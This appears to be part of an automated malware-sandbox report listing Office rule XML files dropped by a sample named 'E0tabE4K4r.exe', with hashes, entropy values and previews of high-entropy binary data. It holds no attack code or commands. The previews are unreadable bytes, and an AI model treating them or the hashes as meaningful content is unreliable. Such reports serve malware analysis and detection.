                                                                                                                                                  Preview:<?xml..5.%....-....vF...w.7.v...8.y.5..sc.....O.....M..2Z...C.......6...Um.m;OqqO....l..........a........9j*]G..D............>. ...ggr...V..WaIm....L...{......aZO...N. *...=..{'j...&j..\0./.s.9.CNE..x..].e.A.!...2...r.2G../g;..* m....'y?s...9f:.1.fK V..0.j;R...]n....; .@.^l6;.x...L..J.j.|..c)H..[Hl..hbU.....w..+.s.j.......f...w...#..P....L.fS./...3........~..^.#v..U.@|Z...m.t..^r.z(..%l....0..w..u.O..b.M..Vx>.x-..J.2.+...$p..)O.H...4c8..;.3[0g@.....M.m...'.y......W.e|.].....D#......}lrT......M..S........E.mTW+|.0.h.T.b.Ybj......@.b...=...L]........l|r$.Tg..B.%........XU..V.5.'l..s.aWt.t...x.....).........(.s..k.{..n.L..T9U...!.^...k...."..~.5+$8..~..y..I3(*.1...B<'..k.1.....|_.1m...c.#..... .ej9d]z..\`"E..G{.4..o.VB...fF.....+<...=.xX<A.W.(.C..@....lR...k...v.......<............5..).>..1.^. ..O........}....d...b.{.........pX..B..2.._(...z..W`/.....Nq..r!.....j..9}/......+e.M....mD..q....n......1@D.....f...=.5y..C.`]...8....]..&.i]p....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):320676
                                                                                                                                                  Entropy (8bit):6.634549237457301
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:4308Xss2cnDfumf6lyGZGAbdVUeEByIp1unb6MYtDMpdSn4X:43r2cnjrfDGZGAZixXpwjYtDMp8na
                                                                                                                                                  MD5:80C22C3A918A1FBA7A214B402C934854
                                                                                                                                                  SHA1:809F8A73C4DA6BC9675C9ED993AFE5285484034B
                                                                                                                                                  SHA-256:D92188884E9CBA992598AFE709F265B60C77E82FF2F5EB40167B8D9D96C3ED13
                                                                                                                                                  SHA-512:65D278C90022D9AAA8C57F1E66013C296DE832407764C3B23284A759EC87A3EDB49F653513406422501D1E9D39F0E95C7F4F797586D98BF6B5ED504951964516
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<Rule..>_.x.p..%..C.e[.W...<G..h..C.`'.z....!#_...1).,......c..i.3......[..D..q...\...J&..P1.+..q.b..0.1`.x.."UL.F._IW..!..A...&..(?.... .....K..I.?....Dtb.c...V:...b.K...&..-..:q......:q.P.?...\.:"..X...O\.."_.dI..80.........../A..=@[m.......LQ..M.hO...d...(Q-r......z.q.........Z.m..r....9S..ZP..r. |.....D...:.q7O|........(.1.....M......Gn.%+...T..\.P.o*.L.X].p0..eo....@k/.)..*,..I..!.0.+..Jq`.K..d..?.p...k....0..E/..okX.R.Tj.`.4......w..A.n]...*..kV...&.z..o.."..+71...a..G.(34%..........H...w.o\.?..VF)...6."..bA...k.#.....*.&Qn.U..`.Sq0.K..../.D.......N.......~[.nS..........2NF..i....c<G.......2........3......ti>....:X..5..X.u.D&.......9.g.....>|..+........?tMS..%..6.r...r...f.Nja`..J....^..N...{+..r.S.....0.VKG.8|R...Q.vB.`.......\P....u.u@.Q..A$....6`..#.7.).GcP.._....6...*.+L.'.._!`H..z........x.....l.r..bZ....[.Y.......Hnk........n...9=8.$.x..J.>....sb..a...`.vC..^...P3.Nw"O.H.7..@1.7....\/../......xg/8..;........

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701851v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1741
                                                                                                                                                  Entropy (8bit):7.893274473926701
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:mgm0PZqYkdBKS4crGM/Zn7pW4y98ttbZ5hFID/pHbD:eYZY/Z9WpCtq/pHX
                                                                                                                                                  MD5:06CBFC685C82B34989D2AB3BCBD00E98
                                                                                                                                                  SHA1:92BC2F2A5E2771EC99F1F2BF0DB1CD6E326A2E6C
                                                                                                                                                  SHA-256:459EE84C7DFE368047A02F5D704169A94B9ED6524360CD29C1133FFCDD264A38
                                                                                                                                                  SHA-512:2516A812AD9FC8F0A5CE0E760BA35F58CB5FAC2A8B432B07BC5427AC55D0BA489942A448B624B17145077711D862E8974DD1DFBF99DFBBA2B1BEBBF00AA09942
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml{..!.u...@y..I.R..*o.*.......JR.....,/>x.....^..K.G...Z5V.&..._.Y{.. ..'..j......E.j..(h/.z|.fe".........QH..O..vVW_.LTu.....X*H.C...m...E...?B#.;*S..`y.u6.g.....@....-.[..=D......ip.?...5O..j...x.....>.T.?...6W.f_.....D)..l...*g..j..!.*....3,..@...9.p+|D.....5 .$.i.9.0...R...WC...A/.W..}Bzk...HL...?..NE..9eU..Tnm..g.....>...t.}.B.].......L......&..?..o.#.....aM.:...6...A..FE.L.?.Z.f.`.}....%.>....r..i.3.p...t..a.....;89?g..6...4....Y...qber...Q../......Od..+.UK........8L.&I.....^.:..TB&....{.}.;...O/K..)........?l...R..c9m...)I.....B..........D.,....|.D...7]..i..H.].t.N..F)!.....:..~...U.ue.mR..$E...z....4d...b.....6.? ..$.........m..dN.?....j.GN.c......{J....8X.P&i=.n..s..Jv.]V..*'....bT..|M....J..L C:.KM.P...."K...k.a./.6U.E.j.V........b....,..}...f.....h.lDK.y5.j"K.....f.E[.N..,_.a}.....z.NL.o.s.....g..g....H.H....YsI{Q2+.m1A..Ev0f..G.*G+...4E....;..........?.O.[..g..MU@?.D....m...v..M..Ul.f... .t.w.M5..m.&Y.c..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701900v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1703
                                                                                                                                                  Entropy (8bit):7.863759019924504
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:CzngNam/iZ242y89deq+4eCaGUP3cD8HvsILRa3D:pN1/V4h8V5Vmc4Dsz
                                                                                                                                                  MD5:063C8F91049F2311506971646B74D99E
                                                                                                                                                  SHA1:F777417CD9DBDC53E7C14F20F476A27A77F5628A
                                                                                                                                                  SHA-256:CCC3F655FF7C9C8D2375CB11ECB6F6F6562F4D9B12D0F22C49CE997AC41AE416
                                                                                                                                                  SHA-512:F1FB7A3F3EAEA5B1F11B2821115574B2FDABCBD5FF765B9882E01010C5BF4F8A8BB80B632AABB92BCA206364E64DAD191FC3AF7FC615F216562A7894EEE83863
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...I...^_...R....=.....U.T.<.Ka.E.....JO.s..)..J.}.:V:...l........=.....E..9|.r4.\..D.i..i..~w.(.s....zo..w2F][...nA_.W..`f..i.<|:.D.k/..X..b..9..1...:..J.N;]....!...h.R}`H...../.....g.x5....t.J....}.a.....:..Z.b>.qD..z.'.....y.`.......1mC..-.....s.IWU.eQB...."P........?wl....pn....\.m.&.............9..k..o.....*V..X..s....a....m.6*.?MK....J.J.j.,L..B_0..,.8u.iU..$M.>..T}..Q~CQgb.-....._CH.O.L..G.A..u....2.Y..3....N."V.........k/.yI..A..<#..5.........A.%....D#..t..T.W.aw..&np.~.cS.y......u.$.<W...JA.=.n..I,.:.1)h...6...].R.v....3./.>.&...L....8<?..^....t]j.!.0hY.P8.....O.D.a.C`....{.k....D....<..O....y.}l4..51R...q....NY.X.cR=7".0.y.}...z.....=..)...?...8&......C .E.E.3.y\..C.C..X...V......>G...xh7&0....[.C...........#e?.y?L2..\p?#..N>7.3./Q...].w%......Rp.3g.0..u.j.d.E.'K.2.6.,.@k.xn.n.0..X...A%.>...n...mZ.'....w..|..L.Kb....n...k....M..eV.n.=..X..L8E.6l^.p=.s.....X.;...xH.K...N..51M....iVA.)[..~..4)..U..h.6.....U......a..W

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701901v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1740
                                                                                                                                                  Entropy (8bit):7.884495935779315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:UDtAQhIVGscjNk1AyAnofY9lbZ0mXsWj/rk9BdcYAD:URzhMcjNk1AyEoQ10mcS/raGYc
                                                                                                                                                  MD5:BDC0A333A0095E91023982D61D0B124A
                                                                                                                                                  SHA1:D42CFE05F02B512EBB9AEBE8EF6D002A8ADE5F72
                                                                                                                                                  SHA-256:DC323A0DA650CA157019EBE1EDE9F926CCF73C858E30B1AD56B6D8C1D9EF8233
                                                                                                                                                  SHA-512:84C88363E419833F458D2428150476CBDACEDCE4F1F74B7B976CC88AF58AE816EE7D8CF3862641923B65B09FC60C31D9C34CA19D1014B1CAE5C7222C9EC9BD53
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.j.D..........^....K.|.. .G;....R.?F.6.q.G....w...M.R+..P....,]..}.u..$.ik.]..;h...t.'..[.*t..cU..}..m....6......".....E.....'v^..Pd..S.IQ..I.....'}......I.....7.%...M.....1$.}.T...Z(3\3.J...v26.p>|....8.;6N....~".f.h.F.(...}....|!.4;k..C.'.....${.....S.h.....xbh...1.F.f..6........zEW7...%9W.K^..4.S..1*...g..tg^........t.~.\r0|B...U..M........>...g..;i(....[Hc..3.1?.H....J...&....z%....A..3.........e....Yj.2..1.-b..Z.hw...Z........{...=a....p...jx....>.......)a.t`I..eG..P....G......6....k<7.j!n.e../.?..=6..B...o.L...u+d.+.@yy..$[..?z2..f...d.+C.........>..c.I......<..&Av..d.......~...M!..M...E ...r.....|-..$...]>/...r.(`;q.>5.._X..kM}.#...E..h...U~L..f..(c?.........7....i...,C...g.D.o...=.P.....4.3.W ...7S..N....ld.e...g.q.--p...K...3..7Rg...F6:.5N.A..xP...W......*.F...).2A....J*.K.....[.n......AU./b...*7?E#!.{...o.IF.~2C.Z{.W........W...m......Z'd.)a../.\.B} ...*P%...ZT...Q.._Z........s....\.\.s?.hw e#.>.|l...$.]..X...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701950v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1713
                                                                                                                                                  Entropy (8bit):7.874260606555404
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Uk61rbBTfZp4wMu9ON/jqSQlK2iusGsqWzzDK92bX8D:UkiTf8w3ULqSD2glq8w/
                                                                                                                                                  MD5:369B233665AAEE68C510E06A305710D0
                                                                                                                                                  SHA1:46D3310BD558B9C0A57908213657A75D907D7880
                                                                                                                                                  SHA-256:46AF688F63D23BA213B056C2A60DF64F83A32CE0D0A0658B992EC834F1537C45
                                                                                                                                                  SHA-512:FD955876C8784FDE2BDD14CCE4BEE2BED44BCEB5C3C03A32B4FC8C02B1787E16366B4480369A3BFD0BA3EF41F4ABDDB63556239AC96F654138ED6D7CDB18E308
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml\D.e"P.u/K.....%"+I\m..2.....U.S.e...g,.9(_.T2x.<-..'9.8..6.a;....UA...IS.].AD=...HQY...;#...{@.lE....u.Q...u)..H......P...}<.*..#....C4L8...Q:.Oe.r........*Q3..7$........l.IP.T.b#.x..'......=..D...D.+....s.Z.E.".Q....yk.\...y..Z.a.,..{^..%......<..x.X$....?.V.].<Q..oZDw.c..w...V..Z.OC996.f.b......... .r.Q..wku.r[N......K....4.J...PAs[M..J...&?.\..'...9..9l..t...Z?$+..m.$..J|T.gZ.B..A..0d...]4I..::.s. ....[1.:.b....OI..RE?.,.2.%.-.;.[g.Rg..Z.....}.........u,..EB.*........nK...XR..t5 M3..P..L.(!...=._..M..&.E..f-.`.'......o..?.gd....... ...s\..y..I..w#"......!..g..U.j|..Yp....,..L].....4...R.g.G..h.fFks'H...?O..{...*...W<..oH.C.{ .11gb.Z..+vHJ.-...b..=`...=.N.r.\9ZPa7.....pG... .f.P..y.3..2....md....... ....9....d..}.%...&.....`..,........c.C\.9a0~'..mt}...............t..:.}...tp.. ...@H..U..........n.s..`..".R.}J.*5..d...'..6......E&......Zuz.N...<.v.....eHS%o.8.0.%...;*Mi..^....h....i.u..@...bk.4o...S.Nw.......6....^.^.m...\

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701951v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1750
                                                                                                                                                  Entropy (8bit):7.880088142021841
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:7YDzZJJQ4zhXEiVFSL6k1T6lJzM9+9J38yXzIWoD:k3ZM0EiVs6+T6lJM+r8yMW0
                                                                                                                                                  MD5:AE8DB3B376DF587BC84206023C575908
                                                                                                                                                  SHA1:DDBD89D451701BCE57399EF06B6AA224762C7ED4
                                                                                                                                                  SHA-256:B72E8570F93144A3205DBB9445E3686D87908637078C62451E694BD35A5E6EA6
                                                                                                                                                  SHA-512:18C85C1BA909E834B2DAE8F8C8F9D0EB831A8F94C5696A11E11851D69095C574055572BF8BDC2FFE542951D04C76873D476F72E2D27306896FC6B550DCB9EF3C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlJ.]..x..+.....;.\...B..2o.c.I>..R..Agv;.....=...3Z....O..gT..@....r.$!..].'..Y.&..@...+l`>..)..<}.G3J.K.H.z....e....p2..j...b)3.Z.O..|.l/..w.G.6..=..C..&Q1......_.."...}..S)J.0.....Jz.,.....>l...U..,[..........9... .=...6B........%.w.-.N[...1!._.<..........[......f..q#l.y9.J/.38w.fr=dK.......3...Wg.. ...=.......#._.9!.......S..g2.....y.Q.u%./%.s...|.O..$....l.K.M..F..fW,.r.F:e..8..H:..x+.:....W.?Ih|.JJ...5.....".`..1|.:<.-....v.3..:.......u....ub.z"E..Qw..........T.m*.NA...2.>....U...J.t.|!.u.t......[..R....y.%v..}..v..=tm.L.]..p......J....d...W.]....d....$Y..A`>...@......0s;....l...Y&._C....p*......"x...N..4.N9y.@....m[..k..,.%.."3...W.1..sx.t.....kQ..<........S...~......$8.+..Ewk..A.H.@ .........../.....\....aw.}&.....,.;w>>xA.$.l..u.yiJ..."Zn30...R+..r.i..r.{.&.8.....A... ,zg.d.......t..^!...0..h>{9.....z.....HQ3.F...-../.iy..L.H..6l.+^.J.8.Ag%%.....j.K..J".GM........>OoL.......:....>.i..n}..Ft..3...K..>. .,..]....`.si.\....v.r...B.a.}.6.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702000v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.899978310996665
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:qVwPVH3Hrt9VIBuYBhpWuH2sk4Q/m6iy0n+GLwD:qaHbWBJfpWX4QQq
                                                                                                                                                  MD5:CA2EFD7A6E06531C766153ECFD6EC254
                                                                                                                                                  SHA1:31A6FE9CC0D0A3FCADAE512BF863FA3E265B1269
                                                                                                                                                  SHA-256:3AC4971D0CE7A7E5A5394B75383A42474383987B8090E97B09485129360542C4
                                                                                                                                                  SHA-512:1DF61E86CE1CE4CCD6F32E3C51205C525F7AE07B93B241025D683DDB4EB1BFB39DD7F60D65C62FFCF480CC40E67C479020F7C9C127251F5DE34CF8C98A934AAE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....}..+..sE..$<W9.%....&...#.4<..hQ.=.:.O.[.>.n..g4X..V1p..o.......|.|.,...`...../R.G.<:.....N.f8.Pu.I.-P.Z........Yc.(g....}.q.Z.....4,.g..'..fc...T.....3....bKn.|.}.va.6,.S.Z.........%....$s.....2.]-P...:i*........&...F.t6.X4.....o.>.R.>......;...r.L`.Qv..f.....7.=...4..T..3.P.R.X..$.A..7.]..v.O..b...9N.Pj.X.G?................}.Y..9.Ud..Io....r&....:.r.p.u.....l+...0YV.Z.%Y..`F;-.h:.....Q.0J.:..eLb.5..m..ze.u....JM....uv.FT.#...B*..[Cx.Y..!..../N.5........5....T..[.xg....S..../....6.#U..t.'Y..KH...9$....!.+(4.....C....IB\9F.^.......#.?X<8..+{3... >......~.<g;....._...N\'.}...#!GRc.w.....Gu.G...%...-...P.....-W0...f...W.U..Y.9i..g..Y....t.u..^&@..:..(.R.._..............+.C.uvy.~..BeQe......h....$..wK.)....u.xF./F..q..=.YO..G..a........7..=.,Z|t.mXn.c*.BN...FXK<!C%.i2.e".?V...v.x.-ag.au...}....?..i;.m......y......^0k.6+U...T.e....H......E..A.............Z.b].D........oIVW..hA.D....na..i.'..r.{8...'C...K:...o...s.vX..R..+...k..J..Y...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702001v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.887415075116016
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:nAdvykrt39QHVJvEueUcRkvpUMbHH4C9ddbSqJ9sd8D:AZjtyHVJvrmKxUMbHNPdbSWei
                                                                                                                                                  MD5:4716FD32E7145D2FC650196B68DD3BC7
                                                                                                                                                  SHA1:AA15205A8F48B088CEC7181CC9FA8294FF6032ED
                                                                                                                                                  SHA-256:8405A027D697E3FAADE8DB3A8EBED05F9D338C804E18A5C877C612104F4AC376
                                                                                                                                                  SHA-512:A651E77642EDB4B4CE313EDF5BCD01B2437417B1BB58E9B952B926AD30AD7CEFC862F8C209E6FEA801CD3BEAA882D5D4407ED4D888077A7C1267EA66BFCB45BD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlI......8|...$..M8.L....;..p.,\.c..<4.........|...b84g...q......j......j......rL.n.V.R...bK..rE.....0....y\K.~.=.....ReIc.u.qk...Rq.F.................5.t...;ER...z@s...8..i.T...K..XL.!6.U.X.*.a....):u.:0..z..j9.".7.h...%.....]\...m."...y...6s...t...Ao................i+...><_.....<|.~%..9.H.K.y....n7....CA...}.....\A...$.I.k....7..~.h...cjF=1..o.k.3c...*.@.W.....'8.~.d..w..X.-..O...C..m.;m.X.....:.dt.53.u..[q.K./;. .A.......$..Q.?3\..s~..;.B.C.....!..S.V..]..O...z#.i....!!..q.......N.nn!7....JZ;r..[?u...0uU...Y."Tb..#fBo.+]..{..8..)..2^...LKq....[=...,ie....A....~}....%....S...U....4..u?%I.d...Z.%.qn..$....).C...... 5.."[....Y.\....z...Y.s.R..N-.&p.@..'.S.....df.\R.$]p}v26,..#.z-..:.../B..:....5.....W.eW-...[.'............S.z.........R}...+...v..c..Nu.....G".%......D.9-;.0.[..........M.!.S..=..A..o?g...Z.+.....~.)%.{ .F.3.z....x'...2+HE....\....>(t...E.....6....a.\..j.j.....R)$q;...f......5..S.[.T..-.A...._}jr.k..\

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702050v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1697
                                                                                                                                                  Entropy (8bit):7.904594577231809
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ukw/7UD1ADwIqLQo5Uo6adYZY30NAPqEvlGm9D:xw/QRADwZZ5rFdYZYXT5F
                                                                                                                                                  MD5:A2220B34AFF86EFDEB0D6F8E63EC167E
                                                                                                                                                  SHA1:F58EF7729EEDCA9961C84442841537FA194DEA15
                                                                                                                                                  SHA-256:FC6496C1038443B6535BCF7D7869CF31A0BEB7C43BDB10114E6ADBEFF3514CC2
                                                                                                                                                  SHA-512:B4DC7D863C520F5B0429C87DD4ACD1BE861780E6B983D38932DB7B83D919CE5886F220F1AE12D7D9D23B4E7FE029AEA9DF51D46F997A1C1596F872F8B61EFE5E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....8.r.5.:.....I.j..`.h.?.]H.....r...<}k..*R..O....@}...8....@..W,...!.|....x.Z'.....W'.K."o3.e.D...|....+.%..~U.!...;25U..<o......&..I.\../2}n.....T...F1~.D.K{I..4>.b..6..?......# S_.B..x..[.......7[..r...C..o.4. L..xw..i...q..#.q`.h...U.D}..Sh..`..%e../.5.F..T.>S.....CIM.B..V..^....{O.d.X...T{_.-......;2..do.UG.b..F.....U.L.iv9\.1.ve...4l.t.x..:..g.....d......iP3..0.....g..W..2/............N.$.2q..[`*.~^.....U.f5~=g....A?.Y-.4.,{..t.+.5.E...CV....S/.K;.Tqx...f..d....{..X...q.....-./..i.......t(;K/.|.E...N..f.S.3.c9.....L!Lgu.....$\..9..........a!...Y..q...."u....> ..._z...V....0....,uH.Cs..#J....6e....[.<.I......DN.K.$*.J.......I.W...p...?.n..7...5...A;...."...J...K..F..J...i.@..\.. z*{v..r...TK|...q. .......k#..^.a.m.O.......L.z...c...y].i1..s.X\z......d.G>..9..[K-.#._\.H..Y..W....[\...E.+s.f.9.D.+.".6.`.3._.#....0..J....W...i....a.,&F...K.*Qh.t...i.,.;;@F....MJ..l.$.....s.b. }.m<@f....q...J............]5nxH.7.4...%#.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702051v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1734
                                                                                                                                                  Entropy (8bit):7.89197335215066
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:uUlWOMEACu8EQVjdxGjrzAXpMmT6CHTeMsE01kva8D:usWOMEACu8ESGvAZe2eM+Ia4
                                                                                                                                                  MD5:E0E119EAAC430997C0F38622BD23EF88
                                                                                                                                                  SHA1:7C0B953BE5400AEE9D50FDBD1B1717C8726FE4D4
                                                                                                                                                  SHA-256:93F80EBB9FA5E132C71A4D38A43BA5435046552ACA56470A632D56F857E8E01B
                                                                                                                                                  SHA-512:D9E0789D77FA64D211EB0FA10E36C890AE55424887C85508F28414BD861307F7A9D66125E04403595C1A9CE63A76338A12C52E582241146521B421694FDDA492
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.N7....*m.S..|.....N+6*%...4...9..=..6.......s>e......G.........U.jm.H.#jm..T......$..V...W..1./..........V..z;.Y.4....J...m..^...n..;..8..T.b.6.......i:z..2..t .)...*..Q..p....,y.t....Q........Ql.l.T.......>c..H,x..!].....Z...]..R..1.P...2x...$!/...UV..@aC.6.....q..ceF..nF:.....U-.B@B....., .B.. I..-.>...I.....g..`.W.=..(.Q..G...T.8...Q...f..m...9..Pn.....3(5%d)Q.z..............M..F~#.v.+.i....pF..t..Dm:Fyk\'.......^<...P.l]../.....-.d..z...;.$.rnRA.......>wT.1...6.......&..g...;.y.X.....Nr.Q..]...B`B.`o,e.g.k..[....UH:.j...U..h....mm.h........3..8u%.%.4.O...CV.......<.\...J....c}.=:9}*."Z.gAPv.#|c..w...jU..k....?\....s&....Q4....^.L...&..5..@..xf....[..$g...C..X......'...R-..._.........L..+..N.J..)4N.y..,=....{..s.P#..w...Q...:7.j4s.&.F.w..$q....^....uV.....f........iw.o.Ld....oV..^:\F'.j.X.j.uB.x..'Z94..N...........S.kW"-Pq.....`dy..Pc'|.7Y...#.u.k.\B... .c...XD1{.."6.s..J..|.bI.0...4cK.-w1.#....g.{.L.\.........I...j.=+...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702100v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1704
                                                                                                                                                  Entropy (8bit):7.8949159825293584
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ITWjbG2HoZYMA/20A9vjCYpibQ9aEvjKpq2OJWBkD85nBIiz5423d6bX93OFieql:lbG2IZzAy7ibQ9R2pKGtxeX96iXRvD
                                                                                                                                                  MD5:4A584A666FA59F7B6809F0EF69DF44FA
                                                                                                                                                  SHA1:3C44DD50F28C6A3915EAA1C64509376A4D2FB45C
                                                                                                                                                  SHA-256:6F1274264C83B23BA8FBB1A5D2264CE013A6012496BCDE300286B8DD7AFF1E76
                                                                                                                                                  SHA-512:C76CED5F2B2EC01C185441300826ED65814863CEA29BFB5853CF9F5689158BCAF1EBEB8E413764C847EBA168CDDFAA224B1072D6439A6B59AC1E6626E3B9C99C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.(...lpA....!.<o.8v6.c.|Vn..*.L...%.......fu.+.M.Y...U.........&.17)#0.....JA*....,.;....D. ..a.1Q-Cw..S....-..^...X.X.../.)..I...uy.t..V.l5..g)....u.<.#A....F.5|..2.....X..&..i.BJ.....f..]'.]".g(A...G.A.x....bU..d.w.....f..TZ.Z..V2..zo...D.....w}....m........<..4........T..9..ds..\a....m.+...g........]0]V.........F.8..\.x..oK.....@.c.EU..C2.b$.x........9...*..K.<.5Z..zp....;9\t.\......`_.j...Vt.M.IT......yK;..<.....#....<...."..b..G+.....z..b.@`...^.!.+.&{}.*.?P..^S...^c<u00j....d..Y..S..].;.P...F..D./3V.@Q...p......-.7.^.V].'..&..x..:G.....iK.].;...."2H.Lf.j_..@.....b%.>O...$...8...VCv.......6q$.......g.1.x.......pcg?..F)..0.K.%.v:..!.3.lGB.^..#..}V.....n..i...?.!..Zd......R..'...d?a..S.8a..|.X.hJ#...t.m...c1.....#.S.k$.\..`dtN.lY..|..x..pdTt.........e....D.v.K.-.........j.(.......8..5L..<;.0r. /..l..ow.a*lk$.!M...q1...a.}...2h........i...h.n.}#.L8.....N.=..-...@eC...&....\.j|..~/$..K./..Z.-.%..L;JKy;]j....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702101v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1741
                                                                                                                                                  Entropy (8bit):7.880033269324738
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:9tr+BibmLjyk1dz3wYd7SEEAb2evGNsHjq5PD:9tqBibmLekd7eIO6Y
                                                                                                                                                  MD5:913AC719499DA9122D0B6FBC7AF3989F
                                                                                                                                                  SHA1:7BABCF3AF748CEF67F693BF49372BD99AB267D20
                                                                                                                                                  SHA-256:38D8A37A72DE3CA189137D70C4EC2DB719B71412050B245061819B1EB3058AD4
                                                                                                                                                  SHA-512:CA56BB0352E4AFAD29A30183FC2A3B58F6843305C37B8C19D6B31EA03729AA35D37F1F7121649EF69DC549694EE63C8BCBF1E28C56310C79D842B315C33A4C0A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml2.L..g..)....7r......L...l.....&6...%../._O.z.M..l.$.a4..F.0%......i$...-6...y) Q.@.a..2...;..1r..y....7....~.3.....P..W.....-...S...i.C1a.;\..W.f:U..KO..".b.......}5.9#Ie..f}f.>..H..b<..f.p.....1.Q#*.w.5.=Z...f.,qR..{..e..?...+W.W}..u..A..;.$..}I.C...v(..$.E...L."7.m.r"...^.8.L>m..^(.^..n.z...R........\:.U.t5.....m>2...^..C....Z..pi....:.8N....2..!'...4<.=.i...Ch<...y%.[.6...#....3.6..&j...S).....Z......c\S..7I..6.B..5=.?.'.jiB..P..9Q.(... .....`>.:..B.A.N..[...9......_@D.9v..t.8.!...1.x..7..J...8.N..x..N.X..x.G...!..$..b..sQ. .^.m/4_ Mp:....\..9]...h....F.$W..#.(*.2J.....}t...@.3b........G...o..*N...5.\,E..4....D.)..y.\....%o...3..js.".)<.Z?.]...v..B..S.....3..).O{.F.)J..U.....e...)......-..y...#..:B.)H"..R..\(.^.3...^..8.7..L....fl..f..F.w.......@..P.a.w.t..;@.Sm....#.... ]..v..4.......n.....w.bF..s5-....Oe8{.!..t.-.v\...-.. 7.;B...wB....q....7.....[4.@.Z...Y<T7Y............<0}@..y..X...c.\xJu)..........I.[.:M........}....._.*..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702150v1.xml

                                                                                                                                                  Download File
